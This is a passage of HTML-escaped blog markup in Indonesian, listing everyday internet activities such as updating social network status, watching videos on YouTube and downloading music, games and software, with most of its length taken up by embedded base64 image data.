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&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
8. &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Update Status Jejaring Sosial&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;
Jejaring sosial adalah sesuatu yang umum di indonesia setiap orang dapat
 memiliki lebih dari 1 akun jejaring sosial. karena dengan jejaring 
sosial kita bisa mengetahui kabar terbaru yang di alami oleh teman kita 
yang berada jauh dari kita walaupun berbeda pulau dan negara tetapi 
masih bisa mengetahui kabar masing masing dengan saling melihat setatus 
yang dibuat. jejaring sosial yang masih familiar di indonesia adalah FB 
dan twiter walaupun masih banyak jejaring sosial yang ada di dunia maya.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img height=&quot;120&quot; src=&quot;http://t1.gstatic.com/images?q=tbn:ANd9GcQq7NKrLHdZNbaBRGh1LC8mY4zV9y9_lzKQaVwfAcTS-s9i9Y_Eow&quot; width=&quot;320&quot; /&gt;&lt;a href=&quot;http://www.malibu-rum.com/Global/Global/Blog/follow_malibu_rum_on_twitter_news.jpg&quot;&gt;&lt;img alt=&quot;http://www.malibu-rum.com/Global/Global/Blog/follow_malibu_rum_on_twitter_news.jpg&quot; border=&quot;0&quot; class=&quot;decoded&quot; height=&quot;204&quot; src=&quot;http://www.malibu-rum.com/Global/Global/Blog/follow_malibu_rum_on_twitter_news.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
9. &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Menonton video,trailer,film&lt;/span&gt;. &lt;/b&gt;menonton video, film, trailer pun dapat kita lakukan di internet, misal di YouTube.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img src=&quot;data:image/jpeg;base64,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&quot; /&gt; &lt;/div&gt;
&lt;br /&gt;
10. &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Download&lt;/span&gt;. &lt;/b&gt;kita dapat men-download bermacam-macam, misal musik, permainan, software dan yang lainnya.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
